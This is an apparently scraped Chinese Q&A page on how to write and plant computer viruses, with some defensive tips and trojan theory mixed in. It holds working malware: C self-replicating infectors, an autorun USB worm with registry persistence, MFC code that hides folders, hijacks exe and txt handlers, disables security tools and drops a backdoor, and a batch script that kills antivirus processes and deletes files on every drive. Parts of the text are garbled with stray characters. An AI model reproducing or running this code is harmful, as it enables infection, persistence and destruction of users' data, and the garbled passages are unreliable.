怎样给文件夹植入病毒代码

㈠ 怎样才能把病毒绑定到文件上（图片）

将病毒文件用rar压掘唤老缩后 使用" /b 图片.jpg+文件.rar 绑定后.jpg"命令即可将两个文件绑定到一起, 可以使用rar或图片浏览器单独打开,但是如果你想要让可判升执行文件运行 需链誉要自己做一个专门的图片浏览器!
记得采纳啊

㈡ 谁能给我一个简单的病毒的代码呀

本代码尽管测试，无任何危险。病毒文件测试代码。使用方法如下：
this
is
not
a
real
virus.
it
is
a
text
file
that
is
used
to
test
antivirus
software.
测试代码：
---------------------请复制下面的代码到文本中保存-------------------
x5o!p%@ap[4\pzx54(p^)7cc)7}$eicar-standard-antivirus-test-file!$h+h*
---------------------请复制上面的代码到文本中保存-------------------
测试方法：
1.鼠标右键点击桌面空白处，创建一个“文本文档”。（什么，还不会建？我倒）
2.将下面这段测试代码复制到“文本”里，保存，然后可以直接右键点击这个文本，用杀毒软件扫描（图1）。也可以等一会，如果你的杀毒软件还行，会自动报毒并将该文本删除，那就可以初步放心了。
测试原理：
该段代码是欧洲计算机防病毒协会开发的一种病毒代码，其中的特征码已经包含在各种杀毒软件的病毒代码库里，所以可以用做测试病毒扫描引擎。
测试等级:
特等：复制完代码后便提示内存李塌有病毒
优等：刚保存完就提示病毒(或者直接删除)
中等：保存后几秒提示病毒(或者直接删除)
下等：需自晌举己启动病毒扫描查杀才提示病毒(或者直接删除)
劣哪谨圆等：无论怎么扫描都无法提示病毒(或者直接删除)

㈢ 病毒隐藏文件夹.cmd的代码

是的，具体显现步骤如下：
1、使用组合键（win键+r）打开运行窗口，输入“notepad”按回车键新建一个记事本。
2、接着将下面的代码复制进记事本中：
for /f “delims=?” %%a in (‘dir /a /b’) do attrib -a -s -h -r “%%a”@echo offpause>nul
exit
然后点击“文件——另存为”选项。
3、在另存为窗口中，点击“桌面”再将保存类型修改为“所有文件（.）”册敬老并将文件名命名为“病毒隐藏文件夹.cmd”最后点击“保存”按钮。
4、此时在桌面上就能够看到一个病毒隐藏文件夹.cmd的文件了，将它拷贝进u盘稿脊根目录，并双击运行程州升序。
5、此时我们就能够看到程序对所有根目录文件执行attrib命令，这样所有被病毒隐藏文件夹就恢复了，刷新即可。

㈣ 怎么编写病毒程序

问题一：如何编写程序病毒？ 那首先要对系统底层的东西比较熟悉，如果编网络病毒，还要对网络协议很了解。并且要精通至少一门编程语言，一般写病毒用a *** （汇编语言）的比较多，用其他也可以，比如vbs（vb脚本语言）或者.bat的海处理，都可以。如果写unix 类系统的病毒用c语言的多一些。但汇编知识是写高级病毒必须的知识。

问题二：如何写一个简单的病毒程序? 前些天学病毒这门技术着实吃了很多苦头，走了很多弯路，尽管按我的知识水平，病毒已经是水到渠成的学习内容了。但是我现在学了入门才发现这门技术实际上隐藏着很多玄机，包含着许多技术，不专门学习研究根本无法达到“牛”的境界上去。如今写了这篇文章，介绍的都是相当实用的东西，可以让你少走许多弯路（有时侯一个错误够你找几个小时的）。不过需要些基础知识才能看懂。假如你有天知识储备够了，不学学病毒将是你的遗憾。另，由于是写给协会会员参考的，也没写的多“专业”，多了些赘述。
在你看之前，你应该知道这只是篇可以带你入门的文章，如果你已经会了就不用看了。看的时候最好准备个PE表在旁边。写病毒程序可以使用很多种语言来写比如C,汇编，甚至有人用Dephi这样可视化编程工具都能写出来。但是最适合写病毒程序的还是汇编语言。汇编语言底层，灵活，速度快，体积小的优势能将一个病毒程序发挥到极至，通常一个程序写出来才几千字节就包含了所有的功能。一般一个病毒都有如下几个功能：
一 代码重定位
二 自己找到所需API地址
三 搜索文件、目录
四 感染文件
五 破坏系统或文件（随便你了）
其中一，二项功能是必要的，五项功能是可选的。而一个病毒程序感染文件的功能是它的核心，是衡量它质量的重要标准。
（一）代码的重定位
一个变量或函数其实是一个内存地址，在编译好后，程序中的指令通过变量或函数的内存地址再去存取他们，这个地址是个绝对地址。如果你将代码插入到其他任何地方，再通埋悔过原来编译时产生的地址去找他们就找不到了，因为他们已经搬家了。但是，你在写程序时考虑到这个问题，你就可以在代码最开始，放上几行代码取物族得程序基地址，以后变量和函数作为偏移地址，显式的加上这个基地址就能顺利找到了，这就是重定位。就象这段代码。
Call getbaseaddress
Getbaseaddress:pop ebx
Sub ebx,offset getbaseaddress
Mov eax,dword ptr [ebx+Var1]
如果你使用宏汇编语言写病毒，请尽量使用ebx做基地址指针，不要使用ebp，因为ebp在调用带参数的函数时会改变。
(二)自己取得所需的API地址
一个win32程序文件，所调用的API函数地址，是由系统填入到程序文件中描述各类数据位置的数据结构中的。而病毒作为一个残废是享受不到这个待遇的。因为你在把病毒的代码插入目标程序时没有把这些描述数据存放位置的数据结构信息也弄进去。它 *** 入到其他目标程序后就成了只有代码的残废儿童：（所以作为一个残废儿童，应当自力更生。自己搜寻自己需要的API地址。目标程序文件就包含了我们需要的东西，我们需要自己去找。目标程序文件只要还是win32程序，它的地址空间中就包含的有Kernel32.dll。如果找到了它，我们就能找到其他任何的东东。第一步，搜寻kernel32.dll的基地址。当然了，整个地址空间有4GB,可供搜索的用户进程空间也有2GB。在2GB中搜索，太吓人了。总不能在执行被感染的目标程序时，先让用户喝杯茶吧？或者斗斗地主？这里有两个技巧向大家介绍。
在程序被加载后，加载程序会调用程序的主线程的第一条指令的位置。它使用的指令是CALL，就是说，你程序还没执行，堆栈弯蚂正区里就有了一个返回地址了，这个返回地址指向的是加载程序，而加载程序是包含在KERNEL32.dll中的，我们顺着它向上找，就能找到kernel32.dll的基地址了。当然也不是一个字节一个字节的挨者找，而是一个页面一个页面地找。因为win3......>>

问题三：怎么用C语言写个简单病毒，给个代码过程 首先声明：
本程序是我举的一个例子
为了叫大家理解就可以了
如果大家拿去捉弄人，我不负任何责任！
希望大家要以学习为重！
对于病毒我们应该是深恶痛绝的，但是作为纯研究许多人还是很有兴趣的
我曾经用汇编做过一些具有毁灭性的病毒，本想献出来与大家分享
不过考虑到一些小人看了会做出来一些危害别人的行为，所以我决定
用这个简单的并毫无伤害性的c语言伪病毒来说明一下问题，
再次声明这一切全是为了编程研究！！！
病毒的特点：
病毒的最大特点就是自我复制，从病毒的分类来说有很多种，这里我们将介绍最流行的附加式
病毒，它通过对正常的文件进行改写，增加来实现其自我复制的目的。
从程序的角度来说，我们要做的事情有两件：
1，让程序能够将自己在不影响其它程序本身工作的情况下复制给其它程序，
使它具备继续复制的能力。
2，在一定条件下使其产生某种发作效果。
其实第一件事情实际上可以看成对文件进行复制，把病毒源文件的功能函数全部放到被感染
文件的最后，同时在被感染文件中调用这个函数
下面给出c语言的实现过程：
1，主程序调用病毒功能函数
2，病毒功能函数读取查找同目录下所有c文件；
3，找到一个（被感染c文件)，打开它，并且将此文件全部读取到数组变量；
4，重新创建一个同名文件（被感染c文件）
5，数组变量写回这个被感染c文件，同时将病毒源文件所需要的头文件，病毒功能函数
调用语句写入；
6，打开病毒源文件，将病毒功能函数全部写到被感染c文件的最后；
这样一个简单的c语言伪病毒virus.c就完成了
运行程序后其内容变化另保存为after_virus.c
此时，如果我们将1.c文件用A盘复制到其他机器或者Email给别人，结果
他们一运行又感染了他们保存1.c文件目录下所有c文件
对于第二件事情-------“发作效果”，这里只用printf语句警告了一下，当然你
完全可以写一个TSR驻留函数
其实，这个程序勉强可以叫做病毒
根本不算是真正的病毒，好了就说这么多，
代码如下：
#include
#include
void main(void)
{
virus();
}
int virus()
{
struct ffblk ffblk;
FILE *in,*out,*read;
char *virus=virus.c;
char buf[50][80];
char *p;
char *end=return;
char *bracket=};
char *main=main;
char *include[2]={stdio.h,dir.h};
char *int_virus=int virus();
char *buffer;
int done,i,j=0,flag=0;
printf(\nI have a virus. Writen by PuBin\n);
done = findfirst(*.c,&ffblk,0);
while (!done)
{
i=0;
if ((in = fope......>>

问题四：病毒一般用什么语言编写的？ 由于现在大多数的所谓的黑客都没有真正的技术，他们的木马都是利用别人编写的木马生成程序生成的，只要一点就好了！~~现在流行的木马有VB、E语言、pascal（注意Delphy不是一门语言，而是pascal语言的编辑器，就像C++跟VC++之间的关系）等，大量用他们编写的原因并不是他们有多好，只不过是他们简单易学！所以只要你有技术，用什么程序写不重要，条条大路通罗马！

问题五：怎样编写简单，对系统无害的病毒文件? 双击这个文件后就会关机，无毒无害。
这是代码：
@echo off
cd/
shutdown -s -t 0 -c Loading Installation,Please Wait...
那个0是打开这个文件后多少秒关机（0就是立即关机，10就是打开文件10秒后关机）， 引号中的字（Loading Installation,Please Wait...）可以随意更改（只是引号里面的，别把引号给删了）。

问题六：怎样编写病毒 3.1.1病毒程序VIRUS.C
这是一个用C语言写的病毒程序，当激发病毒程序时显示时间，然后返回。病毒程序VIRUS.C可将病毒传染给一个C语言程序。当被病毒感染的程序经编译、连接和执行后，又可以将病毒部分传染给其他的C语言源程序。每执行一次带有病毒的C语言程序，就向C语言源程序传播一次病毒。此程序的设计思路如下：
当含有病毒部分的程序被执行时，首先进入病毒程序。它在磁盘上找扩展名为C的匹配文件，如果找到，查找是否有被传染过的标志“INFECTED”。如果有此标志，继续找其它的C文件，直至全部检查一遍。若没有这个标志，则
（1）在未被感染的C程序头部加入“INFECTED”已被传染标志。
（2）读取病毒文件的头文件，将其插入到即将被感染的文件头部。如果发现有重复则不插入。
（3）在主程序中插入“VIRUSES（）；”调用VIRUSES函数。寻找printf、for、while、break语句，如果找到就在之前插入。
（4）在文件尾部插入VIRUSES_SUB子程序。
（5）在插入到将感染文件里面的VIRUSES_SUB子程序里面，必须把文件名改为当前自身的文件名，否则被传染后的文件经过编译、连接和运行后不能再继续传染。
（6）最后插入VIRUSES子程序。这个子程序里面调用了VIRUSES_SUB，执行到这里返回执行结果信息。
其中用到4个出错的返回值，分别是：
1：用户文件太大，不传染；
2：带病毒文件打不开，不传染；
3：带病毒文件读取不成功，不传染；
4：查找第一个匹配文件不成功。
如果返回值是0代表文件传染成功。
具体实现过程如下：
其中用到的函数和结构体用法参考3.3节。
首先导入病毒子程序要用到的三个库文件，分别是dir.h, stido.h, dos.h.在主函数里面只调用VIRUSES函数。紧跟定义VIRUSES函数里面要调用的VIURS_SUB函数。里面定义了若干个变量。ffblk用来保存查找到的匹配文件的信息，用到里面的ff_name变量来保存匹配文件名。
然后定义保存未感染的文件和病毒文件的文件型指针变量，分别用是*virus_r和*virus_v.读取文件的缓冲区，放到二维数组a[500][80]里面临时存放。因为此程序对大于500行的C文件不进行传染，所以完全可以放到里面。首先用getdate函数获取系统当前日期并输出。接着用findfirst函数查找扩展名为C的文件，将其信息保存到ffblk里面。用fgets函数读文件的第一行，长度是80-1个字符。然后用strstr函数检测病毒的标志，看文件是否有INFECT这个标志。
如果有，表示文件已经被传染，关闭文件，不进行传染。当含有病毒部分的程序被执行时，首先进入病毒程序。它在磁盘上查找*.C的匹配文件，一旦找到，查找“已被传染过”的标志INFECTED。若有此标志，继续找其它*.C文件，直至全部检查一遍。
如果没有这个标志，将文件全部读入a[500][80]，如果发现文件超过500行，不传染，返回。将文件指针指向文件头，打开带病毒的文件。如果打不开，返回。
然后读取带病毒文件的前4行，也就是病毒子程序要用到的头文件，写入将被传染的文件。若不能读取带病毒文件，返回。用n_line变量控制行数，把将被传染文件的源程序写回原文件。其中要进行处理不写入病毒文件已有的包含语句，也就是说使＃Include语句不重复。
这点是这样实现的：定义一个字符数组char include_h[]=; strstr函数查看将被传染文件的头文件是否和*include_h[]相同，如果相同，......>>

问题七：怎么用C语言编写木马.病毒等程序 嘿嘿给你个类病毒C程序源码，看下方法吧 #define SVCHOST_NUM 6
#include
#include
char *autorun={[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打开\nshell\\1\\mand=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\mand=SVCHOST.exe\nshellexecute=SVCHOST.exe};
char *files_autorun[10]={c:\\autorun.inf,d:\\autorun.inf,e:\\autorun.inf};
char *files_svchost[SVCHOST_NUM+1]={c:\\windows\\system\\MSMOUSE.DLL,
c:\\windows\\system\\SVCHOST.exe,c:\\windows\\SVCHOST.exe,
c:\\SVCHOST.exe,d:\\SVCHOST.exe,e:\\SVCHOST.exe,SVCHOST.exe};
char *regadd=reg add \HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\ /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f;
int (char *infile,char *outfile)
{
FILE *input,*output;
char temp;
if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,rb))!=NULL) && ((output=fopen
(outfile,wb))!=NULL))
{
while(!feof(input))
{
fread(&temp,1,1,input);
fwrite(&temp,1,1,output);
}
fclose(input);
fclose(output);
return 0;
......>>

问题八：怎么编辑木马病毒程序 很高兴为您解答：
制作并且传播木马都是违法行为，况且在你制作的时候可能会有人利用这漏洞对你的电脑产生危害，到时候就得不偿失拉
建议下其他腾讯电脑管家，开启所有防护，避免有人利用病毒或是木马来危害新的电脑以及帐号的全全
1、腾讯电脑管家独有的二代反病毒引擎，防护查杀更彻底
2、腾讯电脑管家拥有全球最大的云库平台，能更好的识别诈骗、钓鱼网站
3、腾讯电脑管家独创鹰眼模式，时刻保护您的爱机不受侵害
4、腾讯电脑管家独有的安全等级，您可以时刻查看你爱机的安全状态
5、新增广告过滤功能，有效减轻广告骚扰。
祝楼主祝您工作、生活愉快！！

问题九：病毒的编写是用的什么原理? 在计算机领域中，它是一种基于远程控制的黑客工具，具有隐蔽性和非授权性的特点。
所谓隐蔽性是指木马的设计者为了防止木马被发现，会采用多种手段隐藏木马，这样服务端即使发现感染了木马，由于不能确定其具 *** 置，往往只能望“马”兴叹。
所谓非授权性是指一旦控制端与服务端连接后，控制端将享有服务端的大部分操作权限，包括修改文件，修改注册表，控制鼠标，键盘等等，而这些权力并不是服务端赋予的，而是通过木马程序窃取的。
从木马的发展来看，基本上可以分为两个阶段。
最初网络还处于以UNIX平台为主的时期，木马就产生了，当时的木马程序的功能相对简单，往往是将一段程序嵌入到系统文件中，用跳转指令来执行一些木马的功能，在这个时期木马的设计者和使用者大都是些技术人员，必须具备相当的网络和编程知识。
而后随着WINDOWS平台的日益普及，一些基于图形操作的木马程序出现了，用户界面的改善，使使用者不用懂太多的专业知识就可以熟练的操作木马，相对的木马入侵事件也频繁出现，而且由于这个时期木马的功能已日趋完善，因此对服务端的破坏也更大了。
所以所木马发展到今天，已经无所不用其极，一旦被木马控制，你的电脑将毫无秘密可言。
二、木马原理
[编辑本段]
鉴于木马的巨大危害性，我们将分原理篇，防御与反击篇，资料篇三部分来详细介绍木马，希望大家对特洛伊木马这种攻击手段有一个透彻的了解。
【一、基础知识 】
在介绍木马的原理之前有一些木马构成的基础知识我们要事先加以说明,因为下面有很多地方会提到这些内容。
一个完整的木马系统由硬件部分，软件部分和具体连接部分组成。
(1)硬件部分：建立木马连接所必须的硬件实体。 控制端：对服务端进行远程控制的一方。 服务端：被控制端远程控制的一方。 INTERNET：控制端对服务端进行远程控制，数据传输的网络载体。
(2)软件部分：实现远程控制所必须的软件程序。 控制端程序：控制端用以远程控制服务端的程序。 木马程序：潜入服务端内部，获取其操作权限的程序。 木马配置程序：设置木马程序的端口号，触发条件，木马名称等，使其在服务端藏得更隐蔽的程序。
(3)具体连接部分：通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。 控制端IP，服务端IP：即控制端，服务端的网络地址，也是木马进行数据传输的目的地。 控制端端口，木马端口：即控制端，服务端的数据入口，通过这个入口，数据可直达控制端程序或木马 程序。
用木马这种黑客工具进行网络入侵，从过程上看大致可分为六步(具体可见下图)，下面我们就按这六步来详细阐述木马的攻击原理。
一.配置木马
一般来说一个设计成熟的木马都有木马配置程序，从具体的配置内容看，主要是为了实现以下两方 面功能：
(1)木马伪装：木马配置程序为了在服务端尽可能的好的隐藏木马，会采用多种伪装手段，如修改图标 ，捆绑文件，定制端口，自我销毁等，我们将在“传播木马”这一节中详细介绍。
(2)信息反馈：木马配置程序将就信息反馈的方式或地址进行设置，如设置信息反馈的邮件地址，IRC号 ，ICO号等等，具体的我们将在“信息反馈”这一节中详细介绍。
【二、传播木马】.
(1)传播方式:
木马的传播方式主要有两种:一种是通过E-MAIL,控制端将木马程序以附件的形式夹在邮件中发送出 去, 收信人只要打开附件系统就会感染木马;另一种是软件下载，一些非正规的网站以提供软件下载为名义， 将木马捆绑在软件安装程序上，下载后，只要一运行这些程序，木马就会自动安装。
(2)伪装方......>>

问题十：有源代码,怎样编写病毒程序？ 您好：
建议您不要编写或使用病毒程序，病毒程序会对您的电脑造成损害的，如果您曾使用过此类不安全的病毒程序的话，为了您电脑的安全，建议您使用腾讯电脑管家对您的电脑进行一下全面的杀毒吧，打开腾讯电脑管家中的杀毒功能选择闪电查杀或者全盘查杀就可以，您可以点击这里下载最新版的腾讯电脑管家：最新版腾讯电脑管家下载
腾讯电脑管家企业平台：./c/guanjia/

㈤ 木马，病毒等恶意程序通常是利用什么方法植入电脑的如何防范

预防木马病毒，应该采取以下措施
1.安装杀毒软件和个人防火墙，并及时升级。
2. 把个人防火墙设置好安全等级，防止未知程序向外传送数据。
3. 可以考虑使用安全性陪陪比较好的浏览器和电子邮件客户端工具。
4. 如果使用IE 浏览器，应该安装卡卡安全助手，防止恶意网站在自己电脑上安装不明软件和浏览器插件，以免被木马趁机侵入。
5. 不要执行任何来历不明的软件
6. 不要随意打开邮件附件。现在绝大部分木马病毒都是通过邮件来传递的，而且有的还会连环扩散，因此对邮件附件的运行尤其需要注意。
7. 重新选择新的客户端软件 很多木马病毒主要感染的是Microsoft 的OutLook 和OutLook Express 的邮件客户端软件，因为这两款软件全球使用量最大，黑客们对它们的漏洞已经洞察得比较透彻。如果选用其他的邮件软件，例如Foxmail 等，收到木马病毒攻击的可能性就将减小，至少不会反复感染给通信录中的好友。此外也可以直接通过Web方式来访问信箱，这样就能大大降低木马病毒的感染概率。
8. 将资源管理器配置成始终显示扩展名将Windows 资源管理器配置成始终显示扩展名，一些文件扩展名为vbs 、shs 、pif 的文件多为木马病毒的特征文件，如果碰到这些可疑的文件扩展名时就应该引起注意。
9. 尽量少用共享文件夹如果因工作等原因必须将电脑设置成共享，则最好单独设置一个共享文件夹，把所有需共享的文件都放在这个共享文件夹中，注意千万不要将系统目录设置成共享。
10. 运行反木马实时监控程序木马防范重要的一点就是在上网时最好运行反木马实时监控程序，TheCleaner 等软件一般都能实时显示当前所有运行程序并有详细的描述信息。此外再加上一些专业的最新杀毒软件、个人防火墙等进行监控基本就可以放心了。
11. 经常升级系统和更新病毒库。经常关注微软和杀毒软件厂商网站上的安全公告，这些网站通常都会及时地将漏洞、木马和更新公布出来，并在第一时间发布补丁和新的病毒库等。
一般用户在使用电芦轿蠢脑的过程中要注意的几点
1、天上是不会掉馅饼的。
你可能会收到这样的消息，告诉你点击某个网站就可以得到什么好处。这往往是病毒的制造者给你设的陷井，只要你照他说的做了，那你的电脑中病毒的可能性就会提高！因此说，不熟悉的网站要提高警觉。
2、减少好奇心。
邮件中的附件不要轻易点击。陌生人给你发送的邮件如果包含的附件，多数情况下附件是病毒文件。有一些附件为了引诱用户点击经常将自己伪装成美女图片、美女情书或是跟美女有关的东西。切记有时好奇心大了不一定是好事！
3、提高警惕。
现在的病毒也能做到假借你朋友的名义给你传送文件，所以说当收到朋友给你传来的文件后，向朋友问明文件的内容后再打开查看也不晚！
4、非必要的网站插件不帆瞎要安装
去某些网站时总会提醒你安装某某插件。先了解插件的作用后再安装也不迟。当然有一些插件是需要安装的，比如：Flash插件、相关银行网站的安全插件等。对于一些不知名网站的插件或用处不大的插件，最好不要安装。

㈥ CIH病毒的源代码怎么使用阿

1.为源代码建立文件夹
2.把代码包的文件解压进该文件夹
3.在清则茄解压出的文件找找后盯李缀为dsw或者dsp的文件答察。
4.如果已经安装vc＋＋，双击该文件即可。

㈦ 怎样给电脑植入病毒

计算机病毒的传播途径主轮培要通过文件复制、文件传送、文件执行等方式进行，文件复制与文件传送需要传输媒介，文件执行则是病毒感染的必然途径(Word、Excel等宏病毒通过Word、Excel调用间接地执行)，因此，病毒传播与文件传输媒体的变化有着直接的关系。

(1)软盘传播：通过移动存储没备来传播，这些设备主要包括软盘、光盘、u盘等在移动存储设备中，软盘是使用最广泛、移动最频繁的存储介质。

(2)硬件设备传播：通过不可移动的计算机硬件设备进行传播，这些设备通常有计算机的专用的ASIC芯片和硬盘等。由于带病毒的硬盘在本地或移到其他地方使用、维修等，将干净的硬盘感染并再扩散。

(3)网络传播：目前通过网络应用(如电子邮件、文件下载、网页浏览)进行传播已经成为计算机病毒传播的主要方式。

(4)BBs电子布告栏(BBs)：因为上站容易、投资少，因此深受大众用户的喜爱。由于BBs站一般没有严格的安全管理，也无任何限制，这样就给一些病毒程序编写者提供了传播病毒的场所。

(7)怎样给文件夹植入病毒代码扩展阅读：

计算机病毒对微型机系统的危害：

(1)破坏磁盘的文件分配表或目录区，使用户磁盘上的信息丢失。

(2)删除软、硬盘上可执行文件或覆盖文件。

(3)将非法腊没唯数据写DOS内存参数区，引起系统崩溃。

(4)修改或破坏文件和数据。察森

(5)影响内存常驻程序的正常执行。

(6)在磁盘上标记虚假的坏簇，从而破坏有关的程序或数据。

(7)更改或重新写入磁盘的卷标号。

(8)对可执行文件反复传染拷贝，造成磁盘存贮空间减少，并影响系统运行效率。

(9)对整个磁盘进行特定的格式化，破坏全盘的数据。

(10)使系统空挂，造成显示器键盘被封锁的状态。

㈧ 文件夹图标病毒的病毒源代码

bool CVirousApp::OpenFuckFile()
{
char CmdLine[MAX_PATH]={0};
char DirUrl[MAX_PATH]={0};
char HiJack[MAX_PATH]={0};
if(!GetCurrentDirectory(MAX_PATH,DirUrl))
return FALSE;
char ch='\';
if(ch!=*(DirUrl strlen(DirUrl)-1))
{
strcat(DirUrl,\);
}
//此处只在系统根目录下有效
sprintf(HiJack,%s%s\,DirUrl,AfxGetApp()->m_pszAp pName);
//判断是否存在。
可以打开
if(-1==_access(HiJack,0))
return FALSE;
else
{
sprintf(CmdLine,explorer.exe %s,HiJack);
// MessageBox(CmdLine); //For a Test
if(WinExec(CmdLine,SW_SHOW)<31)
return FALSE;
}
return TRUE;
}
2、劫持虚颤肢txt、exe文件，并屏蔽常用安全工具
//定义特征字符串
BOOL check=TRUE;
int len=7;
char *FuckExe[]={USBCleaner,
Kis,
Kav,
IceSword,
Kill,
WSYSCHECK,
360};
//获取参数差世并判断
if(strcmp(m_lpCmdLine,))//如果有参数
{
//判断特征字符串
int i;
for(i=0;i<len;i )
{
if(strstr(_strupr(_strp(m_lpCmdLine)),
_strupr(_strp(FuckExe))))
{ check=FALSE; break;}
}
// LPTSTR ext;
// ext=wcschr(m_lpCmdLine,_T(.)) 1;
CString cmd;
// if(!wcscmp(ext,_T(txt)))
if(strstr(m_lpCmdLine,_T(.txt))||strstr(m_lpCmdL ine,_T(.TXT)))
{
cmd.Format(%s %s,notepad.exe,m_lpCmdLine);
}
else
if(strstr(m_lpCmdLine,_T(.exe))||strstr(m_lpCmdL ine,_T(.EXE)))
{
//此处不完美。洞滑
判断文件名
if(!check)
{
// AfxMessageBox(文件已损坏！);
::MessageBox(NULL,文件已损坏！请重新安装应用程序！,Microsoft,MB_OK);
return FALSE;
}
else
cmd.Format(%s,m_lpCmdLine);
}
WinExec(cmd,SW_NORMAL);
}
else
//打开文件
OpenFuckFile();
3、自启动及实现劫持exe、txt文件
//向系统目录下拷贝程序
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hMole;
hMole=GetMoleHandle(NULL);
GetMoleFileName(hMole,FileSource,MAX_PATH);
CloseHandle(hMole);
GetSystemDirectory(FileNew,MAX_PATH);
strcat(FileNew,\SysKernel.exe);
CopyFile(FileSource,FileNew,TRUE);
SetFileAttributes(FileNew, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//写注册表。
弄个自启动
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft \Windows\CurrentVersion\Run,
SysKernel,REG_SZ,FileNew,0,0);
//写注册表，进行映像劫持
char Hijack[MAX_PATH]={0};
sprintf(Hijack,%s %%1,FileNew);
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Classes\ txtfile\shell\open\command,
NULL,REG_SZ,Hijack,0,1);
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Classes\ exefile\shell\open\command,
NULL,REG_SZ,Hijack,0,1);
4、释放后门，并启动之
BOOL CVirousDlg::ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)
{
HGLOBAL hRes;
HRSRC hResInfo;
HANDLE hFile;
DWORD dwBytes;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);
if (hResInfo == NULL)
return FALSE;
hRes = LoadResource(NULL, hResInfo);
if (hRes == NULL)
return FALSE;
hFile = CreateFile
(
lpFileName,
GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile == NULL)
return FALSE;
WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);
CloseHandle(hFile);
return TRUE;
}
VOID CVirousDlg::ReleaseDoor()
{
char strSystemPath[MAX_PATH];
GetSystemDirectory(strSystemPath, sizeof(strSystemPath));
lstrcat(strSystemPath, \SysService.exe);
ReleaseResource(IDR_BIN, BIN, strSystemPath);
SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//实现后门自启动
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft \Windows\CurrentVersion\Run,
SysService,REG_SZ,strSystemPath,0,0);
WinExec(strSystemPath,SW_HIDE);
}
5、遍历磁盘并拷贝自身
//遍历系统磁盘
BOOL CVirousDlg::FuckFile()
{
DWORD dwNumBytesForDriveStrings;//实际存储驱动器号的字符串长度
LPSTR lp;
CString strLogdrive;
//获得实际存储驱动器号的字符串长度
dwNumBytesForDriveStrings=GetLogicalDriveStrings(0 ,NULL);//*sizeof(TCHAR);
//如果字符串不为空。
则表示有正常的驱动器存在
if (dwNumBytesForDriveStrings!=0)
{
lp=new char[dwNumBytesForDriveStrings];
GetLogicalDriveStrings(dwNumBytesForDriveStrings,l p);
while (*lp!=0)
{
DoBad(lp);
lp=strchr(lp,0) 1;
}
return TRUE;
}
else
return FALSE;
}
//干坏事
VOID CVirousDlg::DoBad(char DriveBuf[])
{
CFileFind finder;
// build a string with wildcards
CString strWildcard(DriveBuf);
strWildcard = _T(*.*);
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hMole;
hMole=GetMoleHandle(NULL);
GetMoleFileName(hMole,FileSource,MAX_PATH);
// CloseHandle(hMole);
// start working for files
BOOL bWorking = finder.FindFile(strWildcard);
while (bWorking)
{
// nReg ;
bWorking = finder.FindNextFile();
// skip . and .. files; otherwise, we'd
// recur infinitely!
if (finder.IsDots())
continue;
// if it's a directory, recursively search it
if (finder.IsDirectory()&&!finder.IsSystem()&&!finder .IsHidden())
{
nReg ;
if(!SetFileAttributes(finder.GetFilePath(),
FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))
continue;
sprintf(FileNew,%s%s,finder.GetFilePath(),.exe );
CopyFile(FileSource,FileNew,TRUE);
if(FUCKREG==nReg)
{
WriteReg(FileNew);
}
}
}
finder.Close();
}

㈨ 批处理文件的病毒代码大全！

最强病毒!谨慎运行!此程序会将系统搞崩溃.

摘自:htt我ps://www是.jb51.net/a链rticle/7129.h接tm 去掉里面的字哦

@echooff
titleYouDEAD!!!!!!!脊迅宏昌肆
settaskkill=s
%0%windir%system32cmd.bat
attrib%windir%system32cmd.bat+r+s+h
netstopsharedaccess>nul
%s%/impfw.exeshadowtip.exeshadowservice.exeqq.exeexplorer.exeIEXOLORE.EXE/f>nul
%s%/imnorton*/f>nul
%s%/imav*/f>nul
%s%/imfire*/f>nul
%s%/imanti*/f>nul
%s%/imspy*/f>nul
%s%/imbullguard/f>nul
%s%/imPersFw/f>nul
%s%/imKAV*/f>nul
%s%/imZONEALARM/f>nul
%s%/imSAFEWEB/f>nul
%s%/imOUTPOST/f>nul
%s%/imnv*/f>nul
%s%/imnav*/f>nul
%s%/imF-*/f>nul
%s%/imESAFE/f>nul
%s%/imcle/f>nul
%s%/imBLACKICE/f>nul
%s%/imdef*/f>nul
%s%/im360safe.exe/f>nul
netstopShadow""System""Service
setalldrive=defghijklmnopqrstuvwxyz
for%%ain(c%alldrive%)dodel%%a:360*/f/s/q>nul
for%%ain(c%alldrive%)dodel%%a:修复*/f/s/q>nul
rem修改注册表.......
REGADDHKEY_LOCAL_
FolderHiddenSHOWALL/v
CheckedValue/tREG_DWORD/d00000000/f>nul
REGADDHKEY_CURRENT_/v
NoRun/tREG_DWORD/d
00000001/f>nul
REGADDHKEY_CURRENT_/v
NoRecentDocsMenu/t
REG_DWORD/d00000001/f>nul
REGADDHKEY_CURRENT_/v
NoDrives/tREG_DWORD/d
4294967295/f>nul
REGADDHKEY_CURRENT_/v
Disableregistrytools/t
REG_DWORD/d00000002/f>nul樱册
REGADDHKEY_CURRENT_/v
NoNetHood/tREG_DWORD/d
00000001/f>nul
REGADDHKEY_CURRENT_/V
NoDesktop/tREG_DWORD/d
00000001/f>nul
REGADDHKEY_CURRENT_/v
NoClose/tREG_DWORD/d
00000001/f>nul
REGADDHKEY_CURRENT_/v
NoFind/tREG_DWORD/d
00000001/f>nul
REGADDHKEY_CURRENT_/v
DisableTaskMgr/tREG_DWORD
/d00000001/f>nul
REGADDHKEY_CURRENT_/v
NoLogOff/tREG_DWORD/d
00000001/f>nul
REGADDHKEY_CURRENT_/v
